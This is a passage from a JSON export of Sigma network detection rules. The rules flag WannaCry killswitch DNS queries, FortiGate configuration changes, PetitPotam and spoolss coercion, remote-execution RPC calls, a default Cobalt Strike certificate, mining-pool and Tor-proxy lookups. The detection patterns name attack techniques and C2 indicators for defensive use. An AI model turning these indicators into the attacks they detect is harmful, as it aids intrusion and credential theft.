    "content": "title: Wannacry Killswitch Domain\nid: 3eaf6218-3bed-4d8a-8707-274096f12a18\nstatus: test\ndescription: Detects wannacry killswitch domain dns queries\nreferences:\n    - https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign\nauthor: Mike Wade\ndate: 2020-09-16\nmodified: 2022-03-24\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query:\n            - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.testing'\n            - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.test'\n            - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com'\n            - 'ayylmaotjhsstasdfasdfasdfasdfasdfasdfasdf.com'\n            - 'iuqssfsodp9ifjaposdfjhgosurijfaewrwergwea.com'\n    condition: selection\nfalsepositives:\n    - Analyst testing\nlevel: high\n"
  },
  {
    "path": "rules/network/firewall/net_firewall_cleartext_protocols.yml",
    "content": "title: Cleartext Protocol Usage\nid: d7fb8f0e-bd5f-45c2-b467-19571c490d7e\nstatus: stable\ndescription: |\n    Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\n    Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\nauthor: Alexandr Yampolskyi, SOC Prime, Tim Shelton\ndate: 2019-03-26\nmodified: 2022-10-10\ntags:\n    - attack.credential-access\n    # - CSC4\n    # - CSC4.5\n    # - CSC14\n    # - CSC14.4\n    # - CSC16\n    # - CSC16.5\n    # - NIST CSF 1.1 PR.AT-2\n    # - NIST CSF 1.1 PR.MA-2\n    # - NIST CSF 1.1 PR.PT-3\n    # - NIST CSF 1.1 PR.AC-1\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AC-5\n    # - NIST CSF 1.1 PR.AC-6\n    # - NIST CSF 1.1 PR.AC-7\n    # - NIST CSF 1.1 PR.DS-1\n    # - NIST CSF 1.1 PR.DS-2\n    # - ISO 27002-2013 A.9.2.1\n    # - ISO 27002-2013 A.9.2.2\n    # - ISO 27002-2013 A.9.2.3\n    # - ISO 27002-2013 A.9.2.4\n    # - ISO 27002-2013 A.9.2.5\n    # - ISO 27002-2013 A.9.2.6\n    # - ISO 27002-2013 A.9.3.1\n    # - ISO 27002-2013 A.9.4.1\n    # - ISO 27002-2013 A.9.4.2\n    # - ISO 27002-2013 A.9.4.3\n    # - ISO 27002-2013 A.9.4.4\n    # - ISO 27002-2013 A.8.3.1\n    # - ISO 27002-2013 A.9.1.1\n    # - ISO 27002-2013 A.10.1.1\n    # - PCI DSS 3.2 2.1\n    # - PCI DSS 3.2 8.1\n    # - PCI DSS 3.2 8.2\n    # - PCI DSS 3.2 8.3\n    # - PCI DSS 3.2 8.7\n    # - PCI DSS 3.2 8.8\n    # - PCI DSS 3.2 1.3\n    # - PCI DSS 3.2 1.4\n    # - PCI DSS 3.2 4.3\n    # - PCI DSS 3.2 7.1\n    # - PCI DSS 3.2 7.2\n    # - PCI DSS 3.2 7.3\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        dst_port:\n            - 8080\n            - 21\n            - 80\n            - 23\n            - 50000\n            - 1521\n            - 27017\n            - 3306\n            - 1433\n            - 11211\n            - 15672\n            - 5900\n            - 5901\n            - 5902\n            - 5903\n            - 5904\n    selection_allow1:\n        action:\n            - forward\n            - accept\n            - 2\n    selection_allow2:\n        blocked: \"false\" # not all fws set action value, but are set to mark as blocked or allowed or not\n    condition: selection and 1 of selection_allow*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_admin_account_created.yml",
    "content": "title: FortiGate - New Administrator Account Created\nid: cd0a4943-0edd-42cf-b50c-06f77a10d4c1\nstatus: experimental\ndescription: Detects the creation of an administrator account on a Fortinet FortiGate Firewall.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/390485493/config-system-admin\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'system.admin'\n    condition: selection\nfalsepositives:\n    - An administrator account can be created for legitimate purposes. Investigate the account details to determine if it is authorized.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_address_object.yml",
    "content": "title: FortiGate - Firewall Address Object Added\nid: 5c8d7b41-3812-432f-a0bb-4cfb7c31827e\nstatus: experimental\ndescription: Detects the addition of firewall address objects on a Fortinet FortiGate Firewall.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'firewall.address'\n    condition: selection\nfalsepositives:\n    - An address could be added or deleted for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_policy_added.yml",
    "content": "title: FortiGate - New Firewall Policy Added\nid: f24ab7a8-f09a-4319-82c1-915586aa642b\nstatus: experimental\ndescription: Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/333889629/config-firewall-policy\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'firewall.policy'\n    condition: selection\nfalsepositives:\n    - A firewall policy can be added for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_local_user_created.yml",
    "content": "title: FortiGate - New Local User Created\nid: ddbbe845-1d74-43a8-8231-2156d180234d\nstatus: experimental\ndescription: |\n    Detects the creation of a new local user on a Fortinet FortiGate Firewall.\n    The new local user could be used for VPN connections.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/109120963/config-user-local\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'user.local'\n    condition: selection\nfalsepositives:\n    - A local user can be created for legitimate purposes. Investigate the user details to determine if it is authorized.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_vpn_ssl_web_portal.yml",
    "content": "title: FortiGate - New VPN SSL Web Portal Added\nid: 2bfb6216-0c31-4d20-8501-2629b29a3fa2\nstatus: experimental\ndescription: |\n    Detects the addition of a VPN SSL Web Portal on a Fortinet FortiGate Firewall.\n    This behavior was observed in pair with modification of VPN SSL settings.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Add'\n        cfgpath: 'vpn.ssl.web.portal'\n    condition: selection\nfalsepositives:\n    - A VPN SSL Web Portal can be added for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_user_group_modified.yml",
    "content": "title: FortiGate - User Group Modified\nid: 69ffc84e-8b1a-4024-8351-e018f66b8275\nstatus: experimental\ndescription: |\n    Detects the modification of a user group on a Fortinet FortiGate Firewall.\n    The group could be used to grant VPN access to a network.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    # - attack.t1098.007\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Edit'\n        cfgpath: 'user.group'\n    condition: selection\nfalsepositives:\n    - A group can be modified for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/fortinet/fortigate/fortinet_fortigate_vpn_ssl_settings_modified.yml",
    "content": "title: FortiGate - VPN SSL Settings Modified\nid: 8b5dacf2-aeb7-459d-b133-678eb696d410\nstatus: experimental\ndescription: |\n    Detects the modification of VPN SSL Settings (for example, the modification of authentication rules).\n    This behavior was observed in pair with the addition of a VPN SSL Web Portal.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-24-535\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n    - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings\n    - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44546/44546-logid-event-config-attr\nauthor: Marco Pedrinazzi @pedrinazziM (InTheCyber)\ndate: 2025-11-01\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    product: fortigate\n    service: event\ndetection:\n    selection:\n        action: 'Edit'\n        cfgpath: 'vpn.ssl.settings'\n    condition: selection\nfalsepositives:\n    - VPN SSL settings can be changed for legitimate purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/network/huawei/bgp/huawei_bgp_auth_failed.yml",
    "content": "title: Huawei BGP Authentication Failures\nid: a557ffe6-ac54-43d2-ae69-158027082350\nstatus: test\ndescription: Detects BGP failures which may be indicative of brute force attacks to manipulate routing.\nreferences:\n    - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nauthor: Tim Brown\ndate: 2023-01-09\nmodified: 2023-01-23\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1078\n    - attack.t1110\n    - attack.t1557\nlogsource:\n    product: huawei\n    service: bgp\n    definition: 'Requirements: huawei bgp logs need to be enabled and ingested'\ndetection:\n    keywords_bgp_huawei:\n        '|all':\n            - ':179' # Protocol\n            - 'BGP_AUTH_FAILED'\n    condition: keywords_bgp_huawei\nfalsepositives:\n    - Unlikely. Except due to misconfigurations\nlevel: low\n"
  },
  {
    "path": "rules/network/juniper/bgp/juniper_bgp_missing_md5.yml",
    "content": "title: Juniper BGP Missing MD5\nid: a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43\nstatus: test\ndescription: Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.\nreferences:\n    - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nauthor: Tim Brown\ndate: 2023-01-09\nmodified: 2023-01-23\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1078\n    - attack.t1110\n    - attack.t1557\nlogsource:\n    product: juniper\n    service: bgp\n    definition: 'Requirements: juniper bgp logs need to be enabled and ingested'\ndetection:\n    keywords_bgp_juniper:\n        '|all':\n            - ':179' # Protocol\n            - 'missing MD5 digest'\n    condition: keywords_bgp_juniper\nfalsepositives:\n    - Unlikely. Except due to misconfigurations\nlevel: low\n"
  },
  {
    "path": "rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml",
    "content": "title: MITRE BZAR Indicators for Execution\nid: b640c0b8-87f8-4daa-aef8-95a24261dd1d\nstatus: test\ndescription: 'Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE'\nreferences:\n    - https://github.com/mitre-attack/bzar#indicators-for-attck-execution\nauthor: '@neu5ron, SOC Prime'\ndate: 2020-03-19\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1047\n    - attack.t1053.002\n    - attack.t1569.002\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    op1:\n        endpoint: 'JobAdd'\n        operation: 'atsvc'\n    op2:\n        endpoint: 'ITaskSchedulerService'\n        operation: 'SchRpcEnableTask'\n    op3:\n        endpoint: 'ITaskSchedulerService'\n        operation: 'SchRpcRegisterTask'\n    op4:\n        endpoint: 'ITaskSchedulerService'\n        operation: 'SchRpcRun'\n    op5:\n        endpoint: 'IWbemServices'\n        operation: 'ExecMethod'\n    op6:\n        endpoint: 'IWbemServices'\n        operation: 'ExecMethodAsync'\n    op7:\n        endpoint: 'svcctl'\n        operation: 'CreateServiceA'\n    op8:\n        endpoint: 'svcctl'\n        operation: 'CreateServiceW'\n    op9:\n        endpoint: 'svcctl'\n        operation: 'StartServiceA'\n    op10:\n        endpoint: 'svcctl'\n        operation: 'StartServiceW'\n    condition: 1 of op*\nfalsepositives:\n    - Windows administrator tasks or troubleshooting\n    - Windows management scripts or software\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml",
    "content": "title: MITRE BZAR Indicators for Persistence\nid: 53389db6-ba46-48e3-a94c-e0f2cefe1583\nstatus: test\ndescription: 'Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.'\nreferences:\n    - https://github.com/mitre-attack/bzar#indicators-for-attck-persistence\nauthor: '@neu5ron, SOC Prime'\ndate: 2020-03-19\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.004\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    op1:\n        endpoint: 'spoolss'\n        operation: 'RpcAddMonitor'\n    op2:\n        endpoint: 'spoolss'\n        operation: 'RpcAddPrintProcessor'\n    op3:\n        endpoint: 'IRemoteWinspool'\n        operation: 'RpcAsyncAddMonitor'\n    op4:\n        endpoint: 'IRemoteWinspool'\n        operation: 'RpcAsyncAddPrintProcessor'\n    op5:\n        endpoint: 'ISecLogon'\n        operation: 'SeclCreateProcessWithLogonW'\n    op6:\n        endpoint: 'ISecLogon'\n        operation: 'SeclCreateProcessWithLogonExW'\n    condition: 1 of op*\nfalsepositives:\n    - Windows administrator tasks or troubleshooting\n    - Windows management scripts or software\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml",
    "content": "title: Potential PetitPotam Attack Via EFS RPC Calls\nid: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a\nstatus: test\ndescription: |\n    Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\n    The usage of this RPC function should be rare if ever used at all.\n    Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n     View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\nreferences:\n    - https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp\n    - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003\n    - https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf\n    - https://threatpost.com/microsoft-petitpotam-poc/168163/\nauthor: '@neu5ron, @Antonlovesdnb, Mike Remen'\ndate: 2021-08-17\nmodified: 2022-11-28\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1557.001\n    - attack.t1187\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    selection:\n        operation|startswith: 'efs'\n    condition: selection\nfalsepositives:\n    - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml",
    "content": "title: SMB Spoolss Name Piped Usage\nid: bae2865c-5565-470d-b505-9496c87d0c30\nstatus: test\ndescription: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.\nreferences:\n    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n    - https://dirkjanm.io/a-different-way-of-abusing-zerologon/\n    - https://twitter.com/_dirkjan/status/1309214379003588608\nauthor: OTR (Open Threat Research), @neu5ron\ndate: 2018-11-28\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path|endswith: 'IPC$'\n        name: spoolss\n    condition: selection\nfalsepositives:\n    - Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_default_cobalt_strike_certificate.yml",
    "content": "title: Default Cobalt Strike Certificate\nid: 7100f7e3-92ce-4584-b7b7-01b40d3d4118\nstatus: test\ndescription: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic\nreferences:\n    - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468\nauthor: Bhabesh Raj\ndate: 2021-06-23\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.s0154\nlogsource:\n    product: zeek\n    service: x509\ndetection:\n    selection:\n        certificate.serial: 8BB00EE\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_kerberos_coercion_via_dns_object_spn_spoofing.yml",
    "content": "title: Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing - Network\nid: 5588576c-5898-4fac-bcdd-7475a60e8f43\nrelated:\n    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2 # Potential Kerberos Coercion via DNS Object Spoofing\n      type: similar\n    - id: e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.\n    The pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\n    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\n    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\n    to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.\nreferences:\n    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\n    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-20\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1557.001\n    - attack.t1187\nlogsource:\n    product: zeek\n    service: dns\ndetection:\n    selection:\n        query|contains|all:\n            - 'UWhRCA' # Follows this pattern UWhRCAAAAA..BAAA\n            - 'BAAAA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_mining_pools.yml",
    "content": "title: DNS Events Related To Mining Pools\nid: bf74135c-18e8-4a72-a926-0e4f47888c19\nstatus: test\ndescription: Identifies clients that may be performing DNS lookups associated with common currency mining pools.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml\nauthor: Saw Winn Naung, Azure-Sentinel, @neu5ron\ndate: 2021-08-19\nmodified: 2022-07-07\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.impact\n    - attack.t1496\nlogsource:\n    service: dns\n    product: zeek\ndetection:\n    selection:\n        query|endswith:\n            - 'monerohash.com'\n            - 'do-dear.com'\n            - 'xmrminerpro.com'\n            - 'secumine.net'\n            - 'xmrpool.com'\n            - 'minexmr.org'\n            - 'hashanywhere.com'\n            - 'xmrget.com'\n            - 'mininglottery.eu'\n            - 'minergate.com'\n            - 'moriaxmr.com'\n            - 'multipooler.com'\n            - 'moneropools.com'\n            - 'xmrpool.eu'\n            - 'coolmining.club'\n            - 'supportxmr.com'\n            - 'minexmr.com'\n            - 'hashvault.pro'\n            - 'xmrpool.net'\n            - 'crypto-pool.fr'\n            - 'xmr.pt'\n            - 'miner.rocks'\n            - 'walpool.com'\n            - 'herominers.com'\n            - 'gntl.co.uk'\n            - 'semipool.com'\n            - 'coinfoundry.org'\n            - 'cryptoknight.cc'\n            - 'fairhash.org'\n            - 'baikalmine.com'\n            - 'tubepool.xyz'\n            - 'fairpool.xyz'\n            - 'asiapool.io'\n            - 'coinpoolit.webhop.me'\n            - 'nanopool.org'\n            - 'moneropool.com'\n            - 'miner.center'\n            - 'prohash.net'\n            - 'poolto.be'\n            - 'cryptoescrow.eu'\n            - 'monerominers.net'\n            - 'cryptonotepool.org'\n            - 'extrmepool.org'\n            - 'webcoin.me'\n            - 'kippo.eu'\n            - 'hashinvest.ws'\n            - 'monero.farm'\n            - 'linux-repository-updates.com'\n            - '1gh.com'\n            - 'dwarfpool.com'\n            - 'hash-to-coins.com'\n            - 'pool-proxy.com'\n            - 'hashfor.cash'\n            - 'fairpool.cloud'\n            - 'litecoinpool.org'\n            - 'mineshaft.ml'\n            - 'abcxyz.stream'\n            - 'moneropool.ru'\n            - 'cryptonotepool.org.uk'\n            - 'extremepool.org'\n            - 'extremehash.com'\n            - 'hashinvest.net'\n            - 'unipool.pro'\n            - 'crypto-pools.org'\n            - 'monero.net'\n            - 'backup-pool.com'\n            - 'mooo.com' # Dynamic DNS, may want to exclude\n            - 'freeyy.me'\n            - 'cryptonight.net'\n            - 'shscrypto.net'\n    exclude_answers:\n        answers:\n            - '127.0.0.1'\n            - '0.0.0.0'\n    exclude_rejected:\n        rejected: 'true'\n    condition: selection and not 1 of exclude_*\nfalsepositives:\n    - A DNS lookup does not necessarily  mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'.\nlevel: low\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_nkn.yml",
    "content": "title: New Kind of Network (NKN) Detection\nid: fa7703d6-0ee8-4949-889c-48c84bc15b6f\nstatus: test\ndescription: NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>\nreferences:\n    - https://github.com/nknorg/nkn-sdk-go\n    - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/\n    - https://github.com/Maka8ka/NGLite\nauthor: Michael Portera (@mportatoes)\ndate: 2022-04-21\ntags:\n    - attack.command-and-control\nlogsource:\n    product: zeek\n    service: dns\ndetection:\n    selection:\n        query|contains|all:\n            - 'seed'\n            - '.nkn.org'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_susp_zbit_flag.yml",
    "content": "title: Suspicious DNS Z Flag Bit Set\nid: ede05abc-2c9e-4624-9944-9ff17fdc0bf5\nstatus: test\ndescription: |\n    The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\n    Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\n    Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\n    Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\n    This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\nreferences:\n    - https://twitter.com/neu5ron/status/1346245602502443009\n    - https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma\n    - https://tools.ietf.org/html/rfc2929#section-2.1\n    - https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS\nauthor: '@neu5ron, SOC Prime Team, Corelight'\ndate: 2021-05-04\nmodified: 2022-11-29\ntags:\n    - attack.t1095\n    - attack.t1571\n    - attack.command-and-control\nlogsource:\n    product: zeek\n    service: dns\ndetection:\n    z_flag_unset:\n        Z: 0\n    most_probable_valid_domain:\n        query|contains: '.'\n    exclude_tlds:\n        query|endswith:\n            - '.arpa'\n            - '.local'\n            - '.ultradns.net'\n            - '.twtrdns.net'\n            - '.azuredns-prd.info'\n            - '.azure-dns.com'\n            - '.azuredns-ff.info'\n            - '.azuredns-ff.org'\n            - '.azuregov-dns.org'\n    exclude_query_types:\n        qtype_name:\n            - 'ns'\n            - 'mx'\n    exclude_responses:\n        answers|endswith: '\\\\x00'\n    exclude_netbios:\n        id.resp_p:\n            - 137\n            - 138\n            - 139\n    condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios)\nfalsepositives:\n    - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.'\n    - 'If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"'\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_torproxy.yml",
    "content": "title: DNS TOR Proxies\nid: a8322756-015c-42e7-afb1-436e85ed3ff5\nrelated:\n    - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544\n      type: similar\n    - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2\n      type: similar\nstatus: test\ndescription: Identifies IPs performing DNS lookups associated with common Tor proxies.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml\nauthor: Saw Winn Naung , Azure-Sentinel\ndate: 2021-08-15\nmodified: 2025-09-12\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    service: dns\n    product: zeek\ndetection:\n    selection:\n        query|endswith:\n            - '.hiddenservice.net'\n            - '.onion.ca'\n            - '.onion.cab'\n            - '.onion.casa'\n            - '.onion.city'\n            - '.onion.direct'\n            - '.onion.dog'\n            - '.onion.glass'\n            - '.onion.gq'\n            - '.onion.guide'\n            - '.onion.in.net'\n            - '.onion.ink'\n            - '.onion.it'\n            - '.onion.link'\n            - '.onion.lt'\n            - '.onion.lu'\n            - '.onion.ly'\n            - '.onion.mn'\n            - '.onion.network'\n            - '.onion.nu'\n            - '.onion.pet'\n            - '.onion.plus'\n            - '.onion.pt'\n            - '.onion.pw'\n            - '.onion.rip'\n            - '.onion.sh'\n            - '.onion.si'\n            - '.onion.to'\n            - '.onion.top'\n            - '.onion.ws'\n            - '.onion'\n            - '.s1.tor-gateways.de'\n            - '.s2.tor-gateways.de'\n            - '.s3.tor-gateways.de'\n            - '.s4.tor-gateways.de'\n            - '.s5.tor-gateways.de'\n            - '.t2w.pw'\n            - '.tor2web.ae.org'\n            - '.tor2web.blutmagie.de'\n            - '.tor2web.com'\n            - '.tor2web.fi'\n            - '.tor2web.io'\n            - '.tor2web.org'\n            - '.tor2web.xyz'\n            - '.torlink.co'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_http_executable_download_from_webdav.yml",
